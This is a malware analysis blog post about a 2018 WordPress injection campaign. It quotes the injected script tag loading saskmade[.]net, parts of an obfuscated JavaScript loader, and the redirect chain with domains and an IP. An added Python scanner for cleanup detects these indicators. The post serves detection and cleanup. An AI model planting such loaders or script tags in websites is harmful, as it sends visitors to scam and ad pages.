Saskmade[.]net Redirects

October 26, 2018, by Denis Sinegubko


Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

The general idea of the malware is the same, but the domain name and the obfuscation have changed slightly.

For example, in the wp_posts table they now inject this script:

<script src='hxxps://saskmade[.]net/head.js?ver=2.0.0' type='text/javascript'></script>

In the <head> section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,
...skipped...
;return _0x2b7638;};var url=String[_0x5a05('0x0')](0x68,0x74,0x74, 0x70,0x73,0x3a,0x2f,0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,...skipped...,0x72,0x3d,0x31,0x2e,0x30,0x2e,0x30);
...skipped...
{if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}

Basically, it’s the same “eval(String.fromCharCode(...” obfuscation with an additional layer that encodes function names and uses character codes in hexadecimal notation (e.g. 0x68 instead of 104).

This script uses the same domain name as the database injection: it loads code from “hxxps://saskmade[.]net/head.js?ver=1.0.0”.
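To help with triage during cleanup, here is an added example (not Sucuri's code, and not the malware itself) of a small Python scanner that decodes char-code calls no matter how the method name is hidden and flags references to the domains quoted in this post. The domain list and the two sample snippets are constructed assumptions modelled on the excerpts above, not real captures.

```python
import re

# Indicators quoted in the post, with the defanging brackets removed.
KNOWN_DOMAINS = ("saskmade.net", "chitax.space")

# A call whose argument list is a run of numeric literals (hex or decimal).
# The method name is not matched on purpose: the second obfuscation layer
# hides 'fromCharCode' behind an array lookup such as String[_0x5a05('0x0')].
CHARCODE_CALL = re.compile(
    r"\(\s*((?:0x[0-9a-fA-F]+|\d+)\s*(?:,\s*(?:0x[0-9a-fA-F]+|\d+)\s*){3,})\)"
)
SCRIPT_SRC = re.compile(r"<script[^>]+src=['\"]([^'\"]+)['\"]", re.I)

def decode_charcodes(arglist: str) -> str:
    """Turn '0x68,0x74,...' or '104,116,...' into the string it encodes."""
    chars = []
    for tok in re.split(r"\s*,\s*", arglist.strip()):
        base = 16 if tok.lower().startswith("0x") else 10
        chars.append(chr(int(tok, base)))
    return "".join(chars)

def find_encoded_strings(js: str) -> list:
    """Decode every char-code call in js and keep the printable results."""
    found = []
    for m in CHARCODE_CALL.finditer(js):
        try:
            s = decode_charcodes(m.group(1))
        except ValueError:
            continue
        if s.isprintable():
            found.append(s)
    return found

def scan_file_contents(text: str) -> list:
    """Findings for one file or post body: encoded and plain references."""
    findings = []
    for s in find_encoded_strings(text):
        if any(d in s for d in KNOWN_DOMAINS):
            findings.append(f"encoded reference to {s}")
    for m in SCRIPT_SRC.finditer(text):
        if any(d in m.group(1) for d in KNOWN_DOMAINS):
            findings.append(f"plain script tag loading {m.group(1)}")
    return findings

# Constructed samples modelled on the snippets in the post (not real captures).
SAMPLE_JS = ("var url=String[_0x5a05('0x0')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,"
             "0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,0x64,0x65,0x2e,0x6e,0x65,0x74,"
             "0x2f,0x68,0x65,0x61,0x64,0x2e,0x6a,0x73);")
SAMPLE_POST = "<p>Hi</p><script src='https://saskmade.net/head.js?ver=2.0.0'></script>"
```

Run `scan_file_contents` over post content exported from the database and over every .js, .php and .html file in the web root; a hit on the encoded form is the stronger signal, since a plain domain search would miss it.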

The saskmade[.]net/head.js script sets the simpleCookie for 8 hours (to prevent recurring redirects), and redirects to “hxxp://chitax[.]space/?h=430584011_b78fa2f3fda_10000000&h_5=sub_id_2&h_2=def_sub”, which works as a traffic directing system that decides where to redirect the user further.

Currently, the redirect chain ends on some page (e.g. hxxps://bnewsb[.]com/) with aggregated ads posing as “news”.

[Image: Landing page with ads posing as news.]

Given the legacy of this campaign, it wouldn’t be surprising if under certain conditions the landing page is more malicious—for example, a tech support scam.

The saskmade[.]net domain was registered just a week ago on Oct 19, 2018, specifically for this campaign. It is currently hosted on a server with the IP 185 .212 .131 .162.

Conclusion

For site cleanup and hardening, please check our previous post which describes the most common security holes used by this attack. You can also refer to our cleanup guide for hacked WordPress sites.

If you don’t have the time or expertise to deal with this problem, you might want to check out our malware removal service.


Categories: WordPress Security
Tags: Balada Injector, Black Hat Tactics, Hacked Websites, Redirects

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.
